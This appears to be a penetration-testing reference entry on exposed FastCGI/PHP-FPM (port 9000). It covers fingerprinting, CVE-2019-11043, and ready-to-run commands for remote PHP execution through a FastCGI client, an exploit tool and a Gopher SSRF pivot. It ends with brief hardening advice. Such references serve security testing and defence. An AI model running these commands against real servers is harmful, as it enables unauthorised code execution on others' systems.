FastCGI / PHP-FPM
aka php-fpm, fcgi
FastCGI (PHP-FPM) on 9000 is meant to be internal-only. Reachable directly — or via SSRF — it executes arbitrary PHP, and CVE-2019-11043 is a remote PHP-FPM RCE on certain nginx configs.
Ports
| Port | Proto | Notes |
|---|---|---|
9000 | tcp | FastCGI / PHP-FPM |
Fingerprint
- Raw FastCGI protocol on 9000 (not HTTP)
- Backend behind an nginx/Apache front end
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2019-11043 | PHP-FPM + nginx misconfig → unauthenticated RCE |
Exploitation primitives
- Direct/SSRF access to 9000 → run PHP via a FastCGI client (set PHP_VALUE auto_prepend_file)
- CVE-2019-11043: crafted request length triggers RCE on vulnerable nginx+FPM
- Reach it through a Gopher SSRF when only the web port is exposed
Overview
FastCGI/PHP-FPM on 9000 is the PHP execution backend. It assumes only the local web server talks to it, so direct or SSRF access is straight code execution.
Enumeration
Confirm something’s on 9000 (it won’t speak HTTP):
nmap -p9000 -sV <TARGET>Execute PHP via a FastCGI client
Run a known script path with injected PHP (auto_prepend_file trick):
fcgi-client.py -host <TARGET> -port 9000 -filepath /var/www/html/index.php -code '<?php system("id"); ?>'CVE-2019-11043 (PHP-FPM + nginx)
php-fpm_exploit -u http://<TARGET>/index.phpSSRF route
If only the web app is reachable, pivot through a Gopher SSRF (gopherus → fastcgi) to hit 127.0.0.1:9000.
Hardening
Bind PHP-FPM to a UNIX socket or localhost only, patch CVE-2019-11043, and validate SCRIPT_FILENAME.